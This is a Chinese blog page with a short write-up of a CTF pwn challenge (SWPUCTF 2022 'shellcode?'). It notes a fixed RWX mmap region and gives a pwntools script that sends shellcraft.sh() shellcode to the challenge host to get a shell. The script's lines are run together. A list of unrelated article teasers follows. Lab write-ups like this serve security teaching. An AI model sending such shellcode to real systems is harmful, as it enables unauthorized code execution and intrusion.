NSSCTF Pwn [SWPUCTF 2022 新生赛]shellcode？题解

ops/2025/2/5 14:48:11/

下载 exeinfo checksec

开启了NX PIE 64位

查看main函数：

发现有个mmap函数查一下：

在固定地址 0x30303000 处创建 4KB 的匿名内存映射，具有可读、写、执行权限

所以将shellcode直接写到上面就能执行

exp：

from pwn import *
context (os='linux', arch='amd64', log_level='debug')
#这行一定要加p = remote("node5.anna.nssctf.cn", 25971)shellcode = asm(shellcraft.sh())p.send(shellcode)
p.interactive()

运行得到flag：

http://www.ppmy.cn/ops/155897.html

（15）基于状态方程的单相自耦变压器建模仿真

1. 引言 2. 单相降压自耦变压器的状态方程 3. 单相降压自耦变压器的simulink仿真模型 4. 实例仿真 5. 总结 1. 引言自耦变压器的原边和副边之间存在直接的电气连接，所以功率是通过感应和传导从原边转移到副边的，这与双绕组变压器不同，后者的原边和副边是电气隔离的。从…

4.PPT：日月潭景点介绍【18】

目录 NO1、2、3、4 NO5、6、7、8 NO9、10、11、12 表居中或者水平/垂直居中单元格内容居中或者水平/垂直居中 NO1、2、3、4 新建一个空白演示文稿，命名为“PPT.pptx”（“.pptx”为扩展名）新建幻灯片开始→版式“PPT_素材.doc…

llama.cpp GGML Quantization Type

llama.cpp GGML Quantization Type 1. GGML Quantization Type2. static const struct ggml_type_traits type_traits[GGML_TYPE_COUNT]3. Q#_K_M and Q#_KReferences 什么神仙妖魔，不过是他们禁锢异族命运的枷锁！ GGUF https://huggingface.co/docs/hu…

部署keepalvied+lVS(dr)高可用集群

第一步，环境准备服务器名称 IP 描述 master VIP:192.168.244.100 DIP:192.168.244.101 高可用keeplived_master LVS负载均衡 backup VIP:192.168.244.100 DIP:192.168.244.102 高可用keeplived_backup LVS负载均衡 server1 RIP:192.168.244.103 Web服务…

LeetCode 0680.验证回文串 II：两侧向中间，不同就试删

【LetMeFly】680.验证回文串 II：两侧向中间，不同就试删力扣题目链接：https://leetcode.cn/problems/valid-palindrome-ii/ 给你一个字符串 s，最多可以从中删除一个字符。请你判断 s 是否能成为回文字符串：如果能…

利用deepseek参与软件测试基本架构如何又该在什么环节接入deepseek

利用DeepSeek参与软件测试，可以考虑以下基本架构和接入环节： ### 基本架构 - **数据层** - **测试数据存储**：用于存放各种测试数据，包括正常输入数据、边界值数据、异常数据等，这些数据可以作为DeepSeek的输入&…

理解PLT表和GOT表

1 简介现代操作系统都是通过库来进行代码复用，降低开发成本提升系统整体效率。而库主要分为两种，一种是静态库，比如windows的.lib文件，macos的.a，linux的.a，另一种是动态库，比如windows的dll文…

MFC开发，给对话框添加垂直滚动条并解决鼠标滚动响应的问题

无论在使用QT或者MFC进行界面开发时，都会出现在一个对话框里面存在好多的选项，导致对话框变得非常长或者非常大，就会显现的不美观，在这种情况下通常是添加一个页面的滚动条来解决这个问题，下面我们就来介绍给MFC的对话…

NSSCTF Pwn [SWPUCTF 2022 新生赛]shellcode？题解

相关文章